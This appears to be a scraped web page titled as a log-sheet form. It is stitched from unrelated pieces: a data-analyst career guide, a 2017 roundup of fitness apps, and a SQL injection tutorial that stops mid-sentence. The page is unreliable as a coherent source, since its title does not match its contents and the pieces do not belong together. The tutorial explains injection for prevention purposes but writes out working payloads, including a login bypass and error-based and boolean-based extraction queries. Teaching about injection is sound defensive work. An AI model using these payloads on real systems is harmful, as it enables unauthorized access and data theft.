Host-A-Ride Program Log Sheet: Fill & Download for Free

Updated Aug 2018The following sections will outline five skills that will help you further a career as a Data Analyst:Data Exploration via Excel/Google SheetsData Extraction with SQLData Visualization via TableauData Automation via PythonData Analysis/Science with Python + Stat librariesWho this is for - College students, new graduates, career changers, and new analysts will probably benefit most from this article. It assumes you have minimal analytics, programming, or work experience. This article should help you build a foundation so you can begin or further a career in data analytics.Who I am - I’m a self-taught analyst who has worked at various companies (Netflix, CNET, Zynga) in a variety of analytical roles (Marketing, Finance, Social, Growth) for over a decade.Two notes before proceeding:This article will not outline how to become a data scientist or data engineer (read more about the differences), which generally require degree(s) in statistics or computer science respectfully.While you can learn these in any order, you’ll probably progress most seamlessly by starting with #1 and #2 before #3–51. Data Exploration via Excel / Google SheetsAt most organizations, Microsoft Excel and/or Google Sheets are the most broadly used data applications. While many tools perform a specific function very well (such as Tableau for visualization), few can enable most lightweight data tasks as easily as a spreadsheet. Not only are Gsheets/Excel the Swiss Army knives of data exploration, they also have a relatively shallow learning curve, which make either a great tool to learn first. If you’re dead-set on other analysts skills, don’t spend too much time here--but don’t make the mistake of not becoming familiar with a spreadsheet program either. Many data questions can be answered and communicated with a spreadsheet faster than with other technologies.Start by learning the following:FormulasGeneral Formulas. Once you’ve downloaded the data, see if you can enhance it with some formulas. The IF statement, boolean logic (AND, OR), and VLOOKUP functions are the most common formulas used across spreadsheets. Afterward, graduate to learning text-based formulas like MID, LEFT/RIGHT, SUBSTITUTE, TRIM. Experiment with the date formulas--such as converting a date (in any format) to the components of a date (year, month, day).Formula References. You should know the difference between an absolute and a relative reference as well as how to input either via editing a formula using the keyboard (F2) as well as toggling either (F4) via the keyboard.Aggregation Formulas. These formulas help you find conditional summary level statistics: SUMIF(s) , COUNTIF(s), and SUMPRODUCT, which are good to learn for reporting purposesInterested in learning more formulas? See this article.Data Filter. The data filter is a key feature which helps end users, sort, filter, and understand a sample from a large data set. Memorize the keyboard shortcut for creating one--you’ll use this often.Pivot Tables. Pivot tables allow an end users to easily get summary level statistics for a given dataset. Learn how to create a pivot table, and scenarios in which to place fields or metrics in the row, column, filter, or value section. Learn how to create formulas at the pivot table level, and understand how creating them on a pivot table is different than at the data table level. Finally, learn the GETPIVOTDATA function, which is especially useful when creating dashboardsCharting and Pivot Charting. Lean how to create bar, line, scatter, and other charts in Excel. Formatting charts is relatively easy--when you want to change something click on it (or right click), and in general the Excel Ribbon or the right click menu will allow you to modify the look and feel of a chart within the ribbon or or menu.Keyboard Shortcuts. As you begin to get more comfortable, begin mastering the keyboard shortcuts rather than use the mouse. Start by learning the basic shortcuts for tactics like find and replace and paste special. Then move onto to navigating using the keypad. Experiment with selecting rows and columns by using a combination of shift and control. You should eventually learn how to add rows/columns, hide rows/columns, delete rows/columns--all by using the keyboard.Excel Dashboard Design. Learn the Data → Pivot → Presentation pattern, in which one separates the source data from summarized data, and summarized data from the viewable dashboard. This pattern will allow you to easily update a report as more data comes in as well as hide complexity from those who just want to see the most important learnings. How? The first tab contains your data, which you should ideally not change. The second tab contains one or many pivot tables that calculate summary statistics needed for the report. The third tab is a dashboard with one or many visuals or data tables that source data primarily from the second tab (and not from first tab). You’ll present just the third tab to end users, but hide the first and second tabs. When displaying summary level statistics, you’ll likely leverage GETPIVOTDATA—instead of using other summary formulas—will has a faster runtime than the summary formulas. This article explains how to create a dashboard using GETPIVOTDATA such that an end user can select various input options and see a visualization change---Some notes:Excel or Google Sheets? Google Sheets performs best with smaller datasets (<10k rows). It’s also free. Out of the box, Gsheets is also more collaborative, and a good solution if your dataset will be viewed or modified by multiple stakeholders. For larger datasets, spreadsheets with lots of formulas, or the use of esoteric features, Excel is usually the preferred optionDon’t learn Excel VBA. If you’re interested in programming, skip to the Data Programming section and consider Python instead.2. Data Extraction with SQLExcel allows you to slice and dice data, but it assumes you have the data readily available. As you become a more seasoned analyst, you'll find that a better way to get at data is to pull it directly from the source, which often means authoring SQL.The great news about SQL is that unlike a procedural based programming language like Python, SQL is a declarative language. In most cases, instead of writing step-by-step syntax to perform an operation, you describe what you want. As a result, you should be able to learn SQL faster than learning most programming languages.I’m not going to outline all of the flavors of data storage solutions (to start, learn about relational vs non-relational databases) but instead focus on what you’re most likely to encounter--a relational database which supports some flavor of SQL.Start by learning the big six reserved keywords:SELECTFROMWHEREGROUP BYHAVINGORDER BYNext, you’ll want to learn common sql functions, such as the CASE statement, boolean operators (AND, OR, NOT), and IFNULL/COALESCE. Next, learn string functions such as INSTR, SUBSTR, and REPLACE.As you begin to write summary level queries which use the GROUP BY keyword, experiment with the aggregate functions such as SUM, COUNT, MIN, and MAX. Following that, learn how to join to other tables. Know the difference between an inner and outer join.Next, take a break from writing SQL and invest in learning more about how relational databases are structured. Know the difference between a fact and dimension table, understand why database indexes (or partitions) are leveraged, and read about why traditional database adhere to 1st, 2nd, and 3rd normal forms. If someone says they have a high cardinality dataset, a snowflaked schema, or slowly changing dimension--you should know what they mean.As you work with larger datasets, you’ll discover that more involved SQL queries require issuing several SQL queries in sequence. For example, the first query may create a table; the second one will insert data into that table; and the third will extract such data. To get started here, read more about temporary tables. Then you’ll want to learn about column data types as well as how to create traditional database tables and indexes/partitions to support more performant querying.---Some notes:SQL Bolt has a great interactive tutorial to help you learn SQL by doingToptal’s top SQL interview questions can help you get your next job that requires knowing SQLThis section only covered data extraction. As you become more senior, you’ll need to know how to build intermediary tables for analysis, or even construct source tables to store non-temporal data. Read more about SQL DML and DDLIf you’re interested in learning more about dimensional modeling, purchase Kimball’s The Data Warehouse Toolkit, which was originally published in 1996 but still relevant for traditional relational databases today.Try creating your own database locally by downloading and installing mysql or postrgres. Or do so via google cloud.This section only covered relational databases. See this article to learn more about non-relational databases3. Data Visualization via TableauIn the past decade, Tableau has become the leading enterprise tool for visualization. If you’re familiar with pivot tables, you’ll find that creating lightweight visualizations and dashboards with Tableau is relatively easy. To spreadsheet users, Tableau feels like working with an enterprise version of Pivot Tables and Pivot Charts. While keeping your analyses private requires a purchased Tableau Desktop license, Tableau public--which stores any saved analyses to the publicly accessible Tableau portal--is free and a great way to get started learning.Let’s start with Tableau Public--begin by creating an account and downloading the software, and then import a dataset into Tableau. Next, learn more about the panels within the tool. You’ll see the data you’ve added broken up into Dimensions and Measures. Try dragging a given dimension into the columns shelf, and a given measure into the Rows shelf. Tableau will analyze the structure of your data, and automatically generate a visualization (without you selecting one). You can easily change the visualization displayed by changing the type, or by shifting the data between Rows and Columns.After you’ve created a couple of different visualizations across multiple worksheets, create a dashboard. A dashboard can contain one or many views (worksheets) and also allow an end user to manipulate such a view via buttons, filters, and other controls. Start by adding one view to your new Dashboard. Then, add a Filter for a given measure or dimension. Once added, you can change the nature of each filter. For example, you can create a slider to change the range of dates included, or add a radio form to allow an end user to select a given measure. Once you have a functional dashboard, feel free to save it to Tableau Public so you can both view it as an external user would as well as modify it later. For inspiration, see some existing dashboards.From here, there’s a lot more you can do and learn. Tableau’s learning curve quickly steepens as you produce more advanced visualizations and deal with more complex datasets. If you want to continue learning, your best bet is to watch Tableau’s series of free training videos.---Some notes:While Tableau is the current Enterprise visualization market leader, it may not be five years from now. Tableau started as a desktop application and then grew to support web-based reporting, and now many upstarts are producing Tableau-like tools that are 100% browser based (See alternatives to Tableau), responsive by default, and built to work in the cloud as well as integrate with other sources.4. Data Programming via PythonNow you can source data from a database with SQL, manipulate it with a spreadsheet, and publish visualizations via a Tableau dashboard. A next natural step is to learn a programming language. Python is the most utilized programming language in the data community as well as the most common language taught at universities. With it you can achieve a number of data-related tasks such as extracting data from a website, loading said data into a database, and emailing the results of a SQL select statement to a set of stakeholders. If you’re interested in building web application, you could use Python and Flask to create an API as well as create a website leveraging the Flask HTML templating engine Jinja2. Or, you can leverage Python Notebooks for iterative development, the PANDAS library to see the results of a model you’re building as you develop it.The best way to build a strong programming foundation is to start by learning computer science fundamentals. For example, I was introduced to many computer programming concepts via the book Structure and Interpretation of Computer Programs (SICP) at university. Although originally authored in 1979, the book’s concepts are still relevant today and are still leverage today used at UC Berkeley to teach introductory computer science. Once you learn many of the fundamentals, you should be able to apply them to learn any computer programming language. However, learning the fundamentals can take a lot of time--and the content in SICP is academically dense (this review describes it well). Sometimes the better tactic to get started is to learn by doing.I learned python syntax years ago via Learn Python the Hard Way. The online course costs $30 now--and there are plenty of other free alternatives--but when I took the course (at the time it was free), I found it to be one of the better tutorials for learning the Python syntax. If you’re looking for a free option, head to Learn Python or Code Academy.You will have covered python basics when you’re familiar with python variables, control-flow, data structures (lists, dictionaries), classes, inheritance, and encapsulation. A good way to solidify your knowledge is to think of a project you’d like to implement and begin developing—this site has a couple of datasets that you can use to get started.Now that you have the basics down, you’ll want to learn more about how to become a more productive programmer by improving your development environment. The next three sub-sections will cover how to save/share/iterate your work using Github, author Python scripts using Jupyter Notebooks, and make changes to projects using the command line.4a. Learn version control using GitHub/git.GitHub allows you to host, update, document, and share your projects easily online. You’ll soon discover that GitHub will likely be where you end up when you’re discovering new programming libraries. Start by creating a GitHub account (almost all developers have one). Then spend time iterating through the GitHub tutorials, which will outline all of the capabilities of git. Once complete, you should be familiar with how to git clone an existing repository, how to create a new repository, git add files to a commit, prepare a set of changes with git commit, and push changes to a branch via git push. As you invest time in any project, make a habit of committing it to github to ensure that you won’t lose your work. You’ll know that you’re progressing with git once you feel comfortable using the above commands for both managing your own projects as well as cloning other projects to augment your development efforts.4b. Author Python scripts using Jupyter Notebooks As you’re learning Python, you’ll discover that there are multiple ways to author python code. Some developers will use IDEs built specifically for programming such as PyCharm, others elect rich text editors with a focus specifically on coding such as Sublime, and a small minority will edit code exclusively through a shell using VIM. Increasingly, data professionals are gravitating toward using notebooks--specifically Jupyter Notebooks--to author scripts in a web browser for exploration purposes. A key feature within notebooks is the ability to execute code blocks within each notebook rather than all at once, allowing the developer to gradually tweak a data analaysis. Moreover, since the output is in the web browser versus a shell, notebooks can display rich outputs, such as an annotated datatable or timeseries graph beneath the code that generated it. This is incredibly helpful when you’re writing a script to perform a data task and want to see the progress of our script as it executes without leaving the browser.There are a variety of ways to get started with Notebooks. One way is to download Jupyter and run an instance on your local machine. Another option is to use Google’s free version of notebooks or Microsoft Azure Notebooks. I prefer to use notebooks hosted on pythonanywhere, which is the same service I use to host python-based web applications. The free service will let you create your own python apps but you can’t run notebooks--the most affordable tier is $5/month.A good way to learn some of the key value adds of developing with Notebooks is to explore a dataset using the Python Data Analyst library, PANDAS. This site has a great getting started tutorial. Start by importing a dataset and print it out. Learn more about the data-frame storage structure, and then apply functions to it just like you would with another dataset. Filter, sort, group by, and run regressions. Try leveraging seaborn, a statistical visualization library which leverages matplotlib to explore your datasets visually. You’ll quickly discover that the framework allows for repeatable data operations with option for data exploration against a moderate cardinality dataset. Notebooks are often the preferred prototyping interface for data scientists, and thus worth learning how to use if you’re interested in learning more about statistics.4c. The Command Line - using shells and editing with vimIf you’ve read this far, you’ve probably already used a shell, a command-line based user interface for interacting with a computer. You’ve likely used shells to execute python code, download code libraries, and commit changes to git. Knowing how to execute a file, navigate within a shell, and monitor an active process will help you become a stronger data analyst. A great place to learn more about shells is following this interactive tutorial. You know that you’re becoming more proficient with shells when you can easily navigate within a directory, create aliases, change file permissions, search for files and/or contents using grep, and view the head/tail of a file.VIM is a unix-originated command-line text editor which is run in a shell. It’s especially useful when you want to view or edit a file—such as a log or a data output—on a remote server. Initially, you’ll likely find that learning VIM is a bit cumbersome because you primarily interact with the application without a mouse. However, over time you’ll begin to develop the muscle memory needed to toggle between edit-mode, view-mode, and executing commands. A great place to get started with VIM is to go through this interactive tutorial. You’ll know that you’re becoming more comfortable with VIM once you can easily navigate between input and edit mode, go to a row by a number, add or delete a row or character, search and replace text, and easily exit and save files you’ve edited.5. Data Analysis/Science with Python + Stat librariesWhile the goal of this article is not to describe how to be a data scientist--that typically requires a undergraduate and/or graduate level education in statistics--having a solid foundation in statistics will help any analyst make statistically sound inferences from most data sets.One way to get started is to take an online course in descriptive statistics--such as this free one from Udacity--which will teach you how to communicate summarized observations from a sample dataset. While you may be tempted to jump to other hotter industry topics such as machine learning, start with the basics. A solid foundation in descriptive statistics is a prerequisite for machine learning as well as many other statistics applications. After going through Udacity or other tutorials, you should be able to describe various types of distributions, identify skews, and how to describe central tendency, variance, and standard deviation.Next up, graduate to learning inferential statistics (such as Udacity’s free course), which will enable you to draw conclusions by making inferences from a sample (or samples) of a population. Regardless with the learning path you take, you should learn how to develop hypothesis as well as become familiar with tactics for validating such hypothesis using t-tests, understand when to leverage different types of experiments, as well as compute a basic linear regression with one more more dependent variables.The two most popular languages for applying statistics are R and Python. If you’re just getting started, I’d recommend using Python over R. Python is generally considered an easier language to learn. Moreover, Python is typically understood by most teams who build data products. There are more libraries available in Python that can be applied to a wider set of data applications--such as deploying a website or creating an api. This means you can often start an exploratory analysis in Python and easily append a few more libraries to deploy a tool / product leveraging such data, which can reduce the time to release. Finally, data applications continue to gravitate to Python over R as the preferred applied statistics language, so by learning the statistical libraries on Python you’ll be riding this latest adoption trend.Regardless of which language you choose, both Python and R can be executed via Jupyter Notebooks, which allow for more easy visualization and communication as you’re getting started.Next, try learning more about machine learning (Udacity’s free ML course is here). Following any course you should be more familiar with how to differentiate a supervised vs unsupervised learning, understand bayes theorem and how it’s used in ML applications, and outline when decision trees are leveraged. Once you’ve learned the concepts, try cementing your understanding by implementing one of these 8 machine learning projects.Finally, Python has a wealth of free libraries commonly leveraged by data scientists. One way to become more familiar with data scientist tactics are to try experimenting with data science libraries. For example, scikit-learn provides standard algorithms for machine learning applications, and NLTK is a library which can help you process and analysis text using NLP.Wrap UpNow you can write a python script to extract data (#4), store it in a database with SQL (#2), build a model to predict future observations with a python data science library (#5), and share what you learn via a spreadsheet (#1) or a Tableau Dashboard (#5). During that process, you may have committed your code to git, authored in a Jupyter Notebook, and published it on your python-hosted server. Congratulations! You’re well on your way to becoming a data analyst.

THE 25 BEST FITNESS APPS FOR 2017CyclemeterFree; $4.99 Elite Upgrade optionalAvailable on: iOSFree at iTunes StoreThe best bicycle-ride tracking app I've tested is Cyclemeter by Abvio. This iOS-only app collects a wealth of data, is very accurate, contains several well-thought-out features, and appeals to fitness enthusiasts who participate in more than one sport. Despite the name, you can use Cyclemeter to track walks, runs, and other activities. It does not include a calorie-counting component, but it is packed with data about your biking outings.Digifit iCardioFree app; requires compatible heart rate monitor (about $50 to $100)Available on: Android, iOSFree at iTunes StoreIf you want real hard stats about your workouts, accelerometers and GPS aren't enough. You need a heart rate monitor...and an app that can access the information it collects. One option is the Digifit iCardio app for iPhone and Android (it's called simply iCardio in Google Play). You can pair it with any supported heart rate monitor to track your runs, bicycle rides, and other workouts. Digifit iCardio records heart rate, of course, but also distance, time, and pace. All the components needed to track heart rate can add up, so plan to spend somewhere in the $50 to $100 range to get full use of this app. If you're in the market for a heart rate monitor, I recommend the MIO Link$79.54 at Amazon wristband.EndomondoFree; $5.99 per month or $29.99 per year for PremiumAvailable on: Android, BlackBerry, iOS, Windows PhoneFree at iTunes StoreEndomondo tracks your runs, bike rides, and other outdoor activities with good accuracy and a simple interface. Its training plans and coaching features, which are limited to Premium subscribers, definitely improve the Endomondo experience.FIT RadioFree; $3.99 per month for PremiumAvailable on Android, BlackBerry, iOSFree at iTunes StoreFIT Radio is a music-streaming app that specializes in DJ-created mixes that maintain a consistent beat. You can browse mixes by genre, DJ, or type of workout, such as Spin, Zumba, or yoga. If you like exploring new music and never want to think about putting together a workout mix on your own, FIT Radio is a great fitness app to try. FIT Radio is free to use, but with the free level, you get only one genre of music (the "FIT Radio Free" genre) and only a few mixes. A premium membership gets you more than 25 genres and stations, access to more mixes, unlimited skips, track list information, the ability to save favorites, DJ profiles, and no ads. Premium membership costs $3.99 per month, $27.99 for the year, or $79.99 for a lifetime.FitbitFree; $49.99 per year for PremiumAvailable on: Android, iOS, Windows Phone, and WebFree at iTunes StoreI came to know the Fitbit system through testing the company's activity trackers, such as the Fitbit Charge HR$122.75 at Amazon, but you don't actually need a tracker to use the mobile app. Without a tracker, the Fitbit app can count your steps (provided your carry your phone all day long), help you track the calories you consume, log your weight, and record other health information, such as blood pressure and glucose levels. If you do own a Fitbit tracker, the app is even easier to use because it logs a good amount of information about your activity automatically. And if you're a full-blown Fitbit junkie, you might also add the Fitbit Aria bathroom scale$128.47 at Amazon, which will automatically add your weight to the app, too.FitStarFree; $7.99 per month or $39.99 per year for PremiumAvailable on: Android, iOSFree at iTunes StoreFitStar creates custom workouts for you based on your fitness level. You start by doing a few workouts with the app and you give it feedback as you go about which exercises were too tough, too easy, or just right. The app uses that information to create a routine that challenges you in all the right ways. FitStar was purchased by Fitbit in 2015 and now works with some Fitbit devices. The in-app coach is former NFL player Tony Gonzalez, a beefy workout buddy who is nothing but a bundle of positive, cheery feedback, and absolutely no excuses.Jefit WorkoutFree; Jefit Pro version available for $4.99Available on: Android, iOSFree at iTunes StoreWhen you hit the gym, do you still carry a notebook or crumpled sheet of paper to all the stations and machines? Don't. With mobile apps for the gym, there are better ways to keep track of your sets and reps. The Jefit Workout app gives you simple tools for crafting weight-lifting workouts and keeping track of the details as you complete your routines. You can log sets and reps, as well as how much you lifted. A calendar helps you plan your workout days and rest days. Jetfit Workout isn't especially rich with features, but it gets the job done.The Johnson & Johnson Official 7 Minute WorkoutFreeAvailable on: Android, iOSFree at iTunes StoreThe Johnson & Johnson Official 7 Minute Workout App (free) helps you squeeze some exercise into your day at an intensity level that's right for you. The interface is surprisingly attractive and clear. All you need is a chair and seven minutes—or about 11 minutes if you add a warm-up and cool down. A medium-intensity workout can include jumping jacks, pushups, wall chair, high-knee running in place, crunches, plank, side plank, triceps dips using a chair, and a few other moves. The app coaches you through each move as it comes up in the workout. It's a great app for people of all ability levels.Lose It!FreeAvailable on: Android, iOS, Kindle, Nook, and WebFree at AmazonThe free website and app Lose It!, designed for counting calories and logging exercise, can help you lose weight, especially if you tend to eat name-brand American foods. Lose It!, which has been around for years, has an incredibly strong community of supportive people to help you stick to your goals. Lose It! is compatible with a long list of other fitness devices and apps, including Nike+ FuelBand, Fitbit devices, Runkeeper, MapMyFitness, and Jawbone UP, so you can import your calorie intake and balance it effortlessly against your calorie expenditure.Map My FitnessFree; optional $5.99 per month membership required for some featuresAvailable on: Android, iOS, Windows Phone$2.99 at iTunes StoreThe company that makes the Map My Run app for runners also makes a slew of similar apps for different sports, such as Map My Ride for cyclists and the more general purpose Map My Fitness. Although it might sound like Map My Fitness will give you the widest range of supported activities, really all the apps have settings that let you track different sports and workouts. In other words, you only need to download one of the apps, and you can use it for almost any activity (Map My Fitness has more than 600 activities). But beware: The free app keeps some of its features behind a subscription pay wall, starting at $5.99 per month or $29.99 per year. As with most fitness apps for running, walking, cycling, etc., Map My Fitness uses GPS to track the routes you travel, and shows you a map of the ground you covered when you're done. It also displays length, in both time and distance, as well as pace, maximum speed, and a few other statistics.My Asics Run TrainingFreeAvailable on: Android, iPhoneFree at iTunes StoreThe My Asics app by sneaker company Asics helps you create a training plan for running a race. Whether you're on route to your first 3K or your fifth marathon, there's a great deal of value in getting a race-training schedule for free. It's usually a premium feature in other run-tracking apps. My Asics isn't the best at tracking runs, but it gets the job done. The reason to use it is for the training schedules, as well as the customizations that come with it. If you can use the app to track your miles and pace and do well, then it will offer to push you harder in your program. If it realizes you're a beginner with a long way to go, your plan will adjust to stay within your reach.MyFitnessPalFreeAvailable on: Android, BlackBerry, iOS, Windows Phone, WebFree at iTunes StoreWe live in a world of temptation, cheap pleasures, stress, and convenience—all of which can affect our diet and health. MyFitnessPal is a mobile app and website that gives you a wealth of tools for tracking what and how much you eat, and how many calories you burn through activity. Of all the calorie counters I've used, MyFitnessPal is by far the easiest one to manage, and it comes with the largest database of foods and drinks. With the MyFitnessPal app you can fastidiously watch what you eat 24/7, no matter where you are.PactFree; wagering money is optional (but kind of the point)Available on: Android, iOSFree at iTunes StorePact, formerly known as Gympact, is an app that you use to wager money on whether you'll go to the gym or complete a workout. The app verifies if you've hit your goals by making sure you check in to the venues where you said you'd pump some iron. If you reach or exceed your goals, you earn cash. If you don't, you have to pay up. The pot is communal, and there are a lot of slackers out there pouring money into it.Pear Personal CoachFree for app; requires heart rate monitorAvailable on: iOSThe Pear Personal Coach app talks you through runs, at-home workouts, yoga routines, and even training programs for running races. Real human voices make the audio part of the experience excellent. The app is free, but in-app purchases can add up. The Android version is called Pear Interactive Coach.RockMyRun$4.99 per monthAvailable on: Android, iOSFree at iTunes StoreRockMyRun changes the tempo of your running music based on your footfalls or heart rate. It also lets you set the tempo of a playlist, if you'd rather try to make your feet keep up with the music. Not every playlist in the RockMyRun app has these advanced features, but many do. With a wide variety of genres, including classical, RockMyRun has plenty of music to explore. In action, the music sounded a little more frenetic than I had imagined it would, but it's a neat app nonetheless and great for those who like to explore new music while running. You can try RockMyRun for free for a week, no credit card required. After that, you'll have to pay $4.99 per month or $35.99 per year to keep using it.RunmeterFree; $4.99 per year for EliteAvailable on: iOSFree at iTunes StoreRich with stats, highly customizable, and with an astoundingly low price for Elite membership, Runmeter is the best running app for data-lovers. Note that the $4.99 price for Elite membership is peryear, making it the least expensive running-app membership you'll find. It's for iOS only, however, so if you switch between having an iPhone and an Android phone, it might not be best for you.Runtastic PRO$4.99Available on: Android, BlackBerry, iOS, Windows Phone, and Web (for accessing account)$4.99 at iTunes StoreRuntastic Pro lets you measure and track your runs, walks, and other exercises, but it also doubles as a coaching app to motivate you to keep working toward your goals. You can use it to train for races, too. The $4.99 Pro version is worthwhile, because the free app lacks (and tries to sell to you through in-app purchases) many of the features that are central to the experience, such as the coaching features, voice feedback, and music player integration. The one-time fee, rather than a subscription, makes Runtastic Pro a good deal.Runtastic Six Pack AbsFree; $4.99 in-app purchase for full content, recommendedAvailable on: Android, iOSFree at iTunes StoreThe Runtastic Six Pack Abs app will leave your midsection muscles burning for days—or simply tighten that tummy, depending on the difficulty level you choose. It's a solid coaching app that targets abs through a wide variety of exercise moves. A human voice (available in several languages) counts through your sets and reps, while a video of an avatar shows you the correct form for each exercise. Some of the training programs are weeks long, and there's plenty of variety along the way.Spring Running Music$2.99 per month or $24.99 per yearAvailable on: iOSFree at iTunes StoreSpring Running Music helps you discover new music during your workouts. This iPhone-only app supports a number of different activities, including running, walking, interval training, bicycling, and more. It has a huge collection of more than 40,000 songs, as well as some pre-made playlists for workouts. With Spring, you keep your pace to the beat, and you can change the music's tempo during your workout if you're looking to slow down or speed up. Subscriptions cost $2.99 per month, $24.99 per year, or $74.99 for a lifetime plan.Spotify$9.99 per monthAvailable on: Android, iOS, Windows PhoneFree at iTunes StoreMusic streaming app Spotify now packs playlists and special features designed for working out. The Running feature, which debuted in 2015, for example, finds your running tempo and plays songs that have a beat that matches it. Spotify also created a few custom Running Original playlists, DJ-mixed electronic music that'll perk up your workout, even if running isn't your thing. Spotify's fitness-focused features are for Premium members only, so expect to pay $9.99 per month for the running and working out music.StravaFree; Premium from $6 per month or $59 per yearAvailable on: Android, iOSFree at iTunes StoreRunners, bicyclists, and other outdoor types have a host of apps and devices they can use to track their activities. The best one for competitive types is Strava. Whether you're competing against yourself to beat your best time, or looking at the long list of strangers on the leaderboard who have smoked you on some nasty uphill stretch of your favorite route, Strava brings a fierce competitive angle. This freemium app is a great one to download if you crave having the heat turned up.SworkitFree; $4.99 per month or $39.99 per yearAvailable on: Android, iOSFree at iTunes StoreSworkit coaches you through workout routines that are designed to meet your goals, whether it's to improve your cardio health, become more flexible, increase strength, and so forth. Within sections, you can choose to work on certain parts of your body, too, such as doing a strength workout that focuses on your core. One extra feature I like is that Sworkit's includes music options from Spotify, so you can stream a premade workout mix. Paying for a Premium account unlocks even more workouts.Touchfit: GSP$4.99 plus $9.99 optional membership (recommended)Available on: iPhone$4.99 at iTunes StoreOne of the most fun and challenging workout apps I've tested is Touchfit: GSP. The GSP stands for Georges St-Pierre, your workout coach and MMA World Champion. He created a number of muscle-boosting routines that he'll coach you through while you use his app. First you complete a test workout, in which you rate different exercises as easy, tough, impossible, or "need to learn." Your answers from that and subsequent workouts inform the app going forward about your difficulty level. The more you exercise, the better the customizations become. You're always challenged without being asked to go beyond your capabilities. Touchfit is similar to FitStar, but St-Pierre's strict style is very different from Gonzalez's upbeat nature.Vida Health Coach$15 per weekAvailable on: Android, iOSFree at iTunes StoreNeed a professional health coach to help you meet your fitness goals? For $15 per week, Vida Health Coach gives you in-app access to a personal coach who works with you one-on-one no matter what your health or fitness objectives are. Once a week, you can talk to your coach by phone or video conference, too, to get real advice. The coaches have a range of certifications and specializations, so if you have, say, gestational diabetes, you'll be able to work with someone who understands your special needs.

Note This Answer Is Taken From SQL Injection Vulnerabilities and How to Prevent Them - Tech and SecuritySQLi is one of the most common and severe vulnerabilities. Learn what you as a developer can do to prevent SQL injection attacks on your application.I am Back With Part 2 Of SQL On Your 1500 Requests In Comments on Tech and Security - Reliability Build In™ . This Time We ‘ll Understand It In Much Deeper Way.Lovepreet SinghA Brief SQL Injection History LessonIn the early days of the internet, building websiteswasstraightforward: no JavaScript, no CSS, and few images. But as the web gained popularity, the need for more advanced technology and dynamic websites grew. This led to the development of CGI and server-side scripting languages like ASP, JSP, and PHP.After Thinking a Lot, I wrote ThisAricleIn Such Way, That Non-Technical Guys AlsoUnderstantIt.Websites changed and started storing user input and site content in databases. It is therefore of no surprise that every popular server-side scripting language added support for SQL databases. However, as with almost every technical advance, hackers discovered new attack vectors, and for as long as relational databases have been used in web applications, so too have SQL Injection attack vectors.The SQL injection vulnerability is one of the most dangerous issues for data confidentiality and integrity in web applications and has been listed in the OWASP Top 10 list of the most common and widely exploited vulnerabilities since its inception. Read the history of the SQL injection vulnerability for a more detailed explanation of how the SQL Injection vulnerability originated.You can also refer to the SQL Injection Cheat Sheet for detailed technical information about the many different variants of the SQL Injection vulnerability.What Is a SQL Injection Vulnerability?Within this blog post, we are trying to shed light on the technical aspects of SQL injections and what you can do to effectively avoid them.Non-Technical Explanation of the SQL Injection VulnerabilityImagine a fully-automated bus that functions based on instructions given by humans through a standard web form. That form might look like this:Drive through <route> and <where should the bus stop?> if <when should the bus stop?>. Sample Populated FormDrive through route 66 and stop at bus stops if there are people at the bus stops.Values in bold are provided by humans and instruct the bus. Imagine a scenario where someone manages to send these instructions:through route 66 and do not stop at bus stops and ignore the rest of this form. if there are people at the bus stops. The bus is fully-automated. It does exactly as instructed: it drives up route 66 and does not stop at any bus stop, even when there are people waiting. Such an injection is possible because the query structure and the supplied data are not separated correctly. The automated bus does not differentiate between instructions and data; it simply parses anything it is fed.SQL injection vulnerabilities are based on the same concept. Attackers are able to inject malicious instructions into benign ones, all of which are then sent to the database server through a web application.Technical Explanation of SQL Injection VulnerabilityAs the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into an SQL statement. To fully understand the issue, we first have to understand how server-side scripting languages handle SQL queries.For example, let’s say functionality in the web application generates a string with the following SQL statement:$statement = "SELECT * FROM users WHERE username = 'lovepreet' AND password = 'techandsecurity'"; This SQL statement is passed to a function that sends the string to the connected database where it is parsed, executed and returns a result.As you might have noticed the statement contains some new, special characters:* (asterisk) is an instruction for the SQL database to return all columns for the selected database row.= (equals) is an instruction for the SQL database to only return values that match the searched string.‘ (single quote mark) is used to tell the SQL database where the search string starts or ends.Now consider the following example in which a website user is able to change the values of ‘$user’ and ‘$password,’ such as in a login form:$statement = "SELECT * FROM users WHERE username = '$userlove' AND password= '$techlover'"; An attacker can easily insert any special SQL syntax inside the statement if the input is not sanitized by the application:$statement = "SELECT * FROM users WHERE username = 'admin'; -- ' AND password = 'anything'";  = 'anything'"; What is happening here? The admin'; -- part is the attacker’s input, which contains two new, special characters:; (semicolon) is used to instruct the SQL parser that the current statement has ended (not necessary in most cases).— (double hyphen) instructs the SQL parser that the rest of the line (shown in light grey above) is a comment and should not be executed.This SQL injection effectively removes the password verification, and returns a dataset for an existing user – ‘admin’ in this case. The attacker can now log in with an administrator account, without having to specify a password.READ ALSO Understating asymmetric and symmetric key cryptography, hash functions, MITM attacks, Salts, Bruteforce attacks and moreThe Different Types of SQL Injection VulnerabilityAttackers can exfiltrate data from servers by exploiting SQL Injection vulnerabilities in various ways. Common methods include retrieving data based on errors, conditions (true/false), and timing. Let’s look at the variants.Error-Based SQL InjectionWhen exploiting an error-based SQL Injection vulnerability, attackers can retrieve information such as table names and content from visible database errors.Error-Based SQL Injection Examplehttps://techandsecurity/index.php?id=1+and(select 1 FROM(select count(),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)2))x FROM information_schema.tables GROUP BY x)a) This Request Returned an ErrorDuplicate entry 'database1' for key 'group_key' The same method works for table names and content. Disabling error messages on production systems helps to prevent attackers from gathering such information.Boolean-Based SQL InjectionSometimes there is no visible error message on the page when a SQL query fails, making it difficult for an attacker to get information from the vulnerable application. However, there is still a way to extract information.When a SQL query fails, sometimes some parts of the web page disappear or change, or the entire website can fail to load. These indications allow attackers to determine whether the input parameter is vulnerable and whether it allows extraction of data.Attackers can test for this by inserting a condition into a SQL query:https://techandsecurity.net/index.php?id=1+AND+1=1 If the page loads as usual, it might indicate that it is vulnerable to a SQL Injection. To be sure, an attacker typically tries to provoke a false result using something like this:https://techandsecurity.net/index.php?id=1+AND+1=2 Since the condition is false, if no result is returned or the page does not work as usual (missing text or a white page is displayed, for example), it might indicate that the page is vulnerable to a SQL injection.Here is an example of how to extract data in this way:https://techandsecurity.net/index.php?id=1+AND+IF(version()+LIKE+'5%',true,false) With this request, the page should load as usual if the database version is 5.X. But, it will behave differently (display an empty page, for example) if the version is different, indicating whether it is vulnerable to a SQL injection.Time-Based SQL InjectionIn some cases, even though a vulnerable SQL query does not have any visible effect on the output of the page, it may still be possible to extract information from an underlying database.Hackers determine this by instructing the database to wait (sleep) a 